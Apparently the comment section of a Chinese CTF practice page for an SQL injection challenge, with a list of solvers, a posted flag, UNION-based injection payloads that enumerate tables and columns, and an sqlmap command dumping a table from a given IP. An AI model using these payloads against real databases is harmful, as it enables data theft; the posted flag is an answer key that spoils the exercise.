评分(24)
解题动态
基尼泰美 攻破了该题 8小时前
寒夜清风 攻破了该题 16小时前
十里故清云 攻破了该题 22小时前
sunset-w 攻破了该题 3天前
Heisemberg 攻破了该题 3天前
Memory621 攻破了该题 4天前
麻辣鸽子头 攻破了该题 4天前
MayBee 攻破了该题 5天前
2523822945 攻破了该题 6天前
kr2yh 攻破了该题 6天前
lichuangpro 攻破了该题 6天前
qq1002517 攻破了该题 6天前
潭影空人心 攻破了该题 6天前
爆汁酸菜鱼 攻破了该题 7天前
czl2025 攻破了该题 7天前
sssyyyttt 攻破了该题 8天前
simple9527 攻破了该题 8天前
Arno_Zoffy 攻破了该题 9天前
满楼红袖招 攻破了该题 9天前
评论
3166235571 1年前
举报
flag{467bbedc241402f5b4e28f37ace7ef82}
不聪明小孩 1年前
举报
-1 'union select 1,2,3,group_concat(column_name) from information_schema.columns where table_schema=database()#找到列名skctf_flag,才能从fl4g的表里面找到对应的列的值
19818532957 1年前
举报
佬,请问为什么用这条只能爆出一个字段名?-1 'union select 1,2,3,column_name from information_schema.columns where table_name='fl4g'; #
DrKeen 1年前
举报
hackbar有问题id=1'做不到,用burp搞了
SmallH 1年前
举报
是不是真的环境被改了呀?真的对照WriteUp一步一步来还是没回显,每次注入就全部重置,是不是考虑退一下金币了???
.⎛⎝•̀ω•́⎠⎞. 1年前
举报
我用sqlmap做出来了
gboyd 1年前
举报
我1’ 1” 1‘) 1”) 1 都试过了为啥都显示正常啊!!!!!
NPC 2年前
举报
环境绝对有问题,照着答案注入都无回显!!!退金币!
EtHat 2年前
举报
sqlmap一把梭哈
blackjack009 2年前
举报
python sqlmap.py -u http://114.67.175.224:11724/index.php --random-agent --dbms mysql --data="id=1" -p id -v 6 -T fl4g --dump
18946551925 2年前
举报
为什么一注入就连接已重置啊??????烦死了,差哪呢?
xiaohaisec 2年前
举报
1'报错 1"不报错,所以使用' 查询数据表 -1' union select 1,database(),group_concat(table_name),4 from information_schema.tables where table_schema=database()# sc fl4g 查询表的字段名 -1' union select 1,databa